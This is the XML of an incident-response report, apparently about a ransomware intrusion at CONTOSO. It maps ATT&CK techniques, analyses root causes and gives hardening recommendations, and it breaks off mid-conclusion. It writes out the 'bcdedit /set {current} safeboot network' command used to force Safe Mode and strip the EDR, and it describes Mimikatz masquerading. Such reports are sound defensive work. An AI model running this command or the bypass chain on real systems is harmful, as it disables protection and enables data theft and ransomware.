    <w:p w14:paraId="35057FD1" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1021.002 - SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05330B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7583F6B9" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1005 - Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D0D38" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1039 - Data from Network Shared Drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10FA7B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T1560.001 - Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66120F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF86F7" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1041 - Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E799070" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1048.003 - Exfiltration Over Unencrypted Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A7094E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1CCF67" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1486 - Data Encrypted for Impact (1,247 files, 4.8 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D62A3" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1490 - Inhibit System Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDADE1" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17946017" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>ROOT CAUSE ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237138B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Missing OS-Level Protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F59663" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Windows Credential Guard: NOT ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3997141B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credential Guard uses virtualization-based security to protect credentials. Without it, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> successfully accessed plaintext credentials in LSASS memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB15DD" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>LSASS Protected Process Light (PPL): NOT ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB2B91F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LSASS PPL prevents unauthorized memory access. Without it, the masqueraded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (svchost.exe) had unrestricted access to dump credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F749B14" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. File Masquerading Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E0651" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was saved as 'svchost.exe' (legitimate Windows process name) in C:\Users\sarah.mitchell\AppData\Local\Temp\. This bypassed signature-based detection as the filename matched a legitimate process and hash validation was not enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4FFCF" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Safe Mode Boot Configuration Weakness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C066C63" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">No Group Policy Restriction on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D78D0AF" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker was able to execute '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /set {current} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>safeboot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> network' to force Safe Mode boot. No Group Policy prevented modification of boot configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA7E52" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>EDR Kernel Drivers Do Not Load in Safe Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD0B32" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>By design, third-party kernel drivers (including EDR) are disabled in Safe Mode. CrowdStrike Falcon's kernel driver (CSAgent.sys) did not load, leaving the system completely unprotected. The winupdate.exe EDR removal tool executed with SYSTEM privileges and deleted all CrowdStrike components without resistance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA35D4B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Local Admin Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F082D" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> had sufficient administrative rights to execute bcdedit.exe and modify system boot configuration. Principle of least privilege was not enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529587A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. EDR Tamper Protection Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3407A7" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CrowdStrike's Tamper Protection successfully blocked direct service termination attempts (10:49:20 - Access Denied). However, Tamper Protection cannot prevent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> system commands or protect against Safe Mode bypass. Once in Safe Mode, the EDR driver is not loaded and cannot defend itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D166883" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB43113" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>RECOMMENDATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB6452" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CRITICAL (Implement Immediately - Within 24 Hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD45D07" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Enable Windows Credential Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01BB13" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy via Group Policy: Computer Configuration &gt; Administrative Templates &gt; System &gt; Device Guard &gt; Turn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Virtualization Based Security. Enable Credential Guard with UEFI lock. Requires Windows 10 Enterprise/Windows Server 2016 or later with compatible hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36728019" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Enable LSASS Protected Process Light (PPL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A921C3" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Configure via registry: HKEY_LOCAL_MACHINE\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RunAsPPL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 1. Or deploy via Group Policy. This prevents unauthorized memory access to LSASS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30811826" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Restrict Safe Mode Boot Modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63882944" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy Group Policy: Computer Configuration &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment &gt; "Perform volume maintenance tasks" - Remove standard users. Additionally, configure Software Restriction Policies to prevent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> execution by non-administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A41022" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Reset All Compromised Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BE0EA" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Immediately reset: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jennifer.hayes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Domain Admin), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backup.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Force password reset for all domain users. Implement MFA for ALL accounts, especially privileged accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C02E86" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>HIGH Priority (Within 7 Days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5A963" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Application Whitelisting with Hash Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55002B95" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy Windows Defender Application Control (WDAC) or AppLocker with hash-based rules. This prevents execution of files masquerading as legitimate processes (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as svchost.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0294CD32" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Block Executable Email Attachments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2190B761" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Configure Exchange/Outlook to block .exe, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, .com, .bat, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, .ps1, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attachments. Deploy email sandboxing for remaining attachment types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7D144" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Implement Just-In-Time (JIT) Admin Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84040E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Remove standing Domain Admin privileges. Implement Azure AD Privileged Identity Management or equivalent for time-limited, approval-based admin access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C6B93" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Network Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D79BC0" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Isolate file servers from workstation VLAN. Implement firewall rules restricting RDP/SMB to authorized jump hosts only. Block C2 IP 185.220.101.42 at perimeter firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557EFB2D" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>MEDIUM Priority (Within 30 Days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376D2CE" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. PowerShell Constrained Language Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081DA11" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Deploy PowerShell Constrained Language Mode via AppLocker or WDAC to restrict access to .NET methods like IEX, DownloadString, and reflective loading APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10977E9E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Enhanced Logging &amp; SIEM Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE12EF8" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable PowerShell Script Block Logging, Module Logging, and Transcription. Configure Sysmon with enhanced rules. Forward all security logs to centralized SIEM with alerting on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> execution, Safe Mode boots, and EDR service failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD3AE95" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11. EDR Deployment Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD5B17" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Configure CrowdStrike Falcon early-launch anti-malware (ELAM) driver to start before other drivers. Consider implementing UEFI Secure Boot to prevent boot configuration tampering at firmware level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC5220" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. Security Awareness Training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE78E7C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Mandatory phishing awareness training focusing on executable attachments. Simulated phishing campaigns quarterly. Train users to report suspicious emails immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5452045C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697E2B0A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284614DF" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The 03 February 2026 incident at CONTOSO Corporation represents a sophisticated, multi-stage attack that successfully bypassed an operational EDR solution through Safe Mode boot manipulation. This was not a failure of CrowdStrike Falcon - the EDR detected tampering attempts and successfully blocked direct service termination. Rather, this demonstrates a knowledgeable adversary exploiting a legitimate Windows feature (Safe Mode) to achieve complete security control bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B7A9E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBBBD71" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Credential Guard and LSASS PPL would have prevented the initial credential theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F5AD0" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>CrowdStrike's Tamper Protection worked as designed - it blocked direct attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2BB156" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The Safe Mode bypass is a known limitation of all EDR products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EE690" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
